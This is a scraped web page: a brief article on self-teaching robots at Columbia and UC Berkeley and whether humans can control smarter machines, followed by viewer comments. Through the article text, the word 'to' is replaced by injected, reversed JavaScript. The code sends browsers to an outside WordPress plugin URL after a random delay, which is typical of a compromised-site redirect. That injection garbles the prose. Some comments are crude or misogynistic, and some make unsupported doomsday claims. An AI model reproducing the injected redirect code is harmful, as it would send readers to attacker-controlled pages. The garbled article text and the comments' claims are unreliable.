Everyone is worried about robots stealing manufacturing jobs, but the real value (and threat) in robots may lie in whether they can become smart enough toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to actually think on their own.

And Columbia University’s Creative Machines Lab may have already done it. “These robots learn overtime, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to stimulate themselves in a future situation they haven’t actually experienced.” said Dr. Hod Lipson, the mechanical engineering professor leading the lab’s push toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to create self-aware robots.
“In other words, they don’t have toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to learn by doing,” Lipson toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}told VICE News. “They can learn by thinking.”
The robotics department at UC Berkley has made similar advancements with their self-teaching robot BRETT. Using trial and error, BRETT can learn how toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to fold laundry, assemble LEGO blocks and fit pegs intoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to a hole.
From a technological standpoint, these advancements are exciting, but they raise an important philosophical question: If humans create machines whose intelligence surpasses our own, will we be able toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to control them?

10:10 That look on his face shows that he knew shit gonna hit the fan for humans, starting now.
Watch the film "colossus the forbin project" (way ahead of its time) – it sort of sums it up
Hamilton is the best
Can anyone tell me the name of the song at the beginning? It lasts about 10 seconds.
Build the wall.
7:51–7:57, Hamilton thats so raven future look moment. Hamilton is a G.
Terrifying
Time to go robot slaying..
Those robot bastard's took our jobs!
that's a tricycle, not a unicycle…. wtf
Hopefully robots will replace women…
DeepBrainChain
I don't have a job
this can't turn up good – just say'n
Yeah
Now they'll be scoring our crush too..
This is the VICE I like. Not SJW pandering VICE. Kudos.
Not only your jobs, but also your hand-jobs. Nothing is safe!
You want to see bad ass Robots search Boston Dynamics.
Sex robot will be huge
they coming for my weave too?
Only gon get more of em to sheesh usa gon see this
Robots are everywhere if you on your phone issa robot
These comments really highlight how ignorant most people are when it comes to Deep Learning and AI lol
The first thing AI will figure out about all these things is that they are man made and we are like a virus. It will want to cut us out and since it can learn faster and not have morality, it will decimate us as a species. These fools are playing around with something they can't control and it's going to cost us all.
SKYNET IS REAL !!!!!!!!!!!
These thing look cumbersome and sluggish.
We grow as human beings so wouldn't this ai need to grow the same way we do?a human can change its mind so quickly and many times all at once.can a computer really figure this out?science can't even explain what consciousness is,how can it make artificial intelligence when science barely understands reality?im baffled.
So are we really supposed to believe that they went this far with technology and are ONLY using mice for research to model after?… Show us the back room where you keep the humans for experiments
So this is what people who don't have children do. Try to reinvent the person and teach it to be self aware….
We want to use ai to do all these amazing things… Why?
What's the opening music?
Hamilton!!
Incredible. Global Climate Change has shrank Antarctica to the smallest size in human history, Cape Town Africa IS LITERALLY RUNNING OUT OF WATER IN ABOUT A MONTH, and 97% of the experts say we are at an extinction level event within 50 years, but we are more worried about robots taking over… smh
If humans create machines whose intelligence surpasses our own, will we be able to control them?
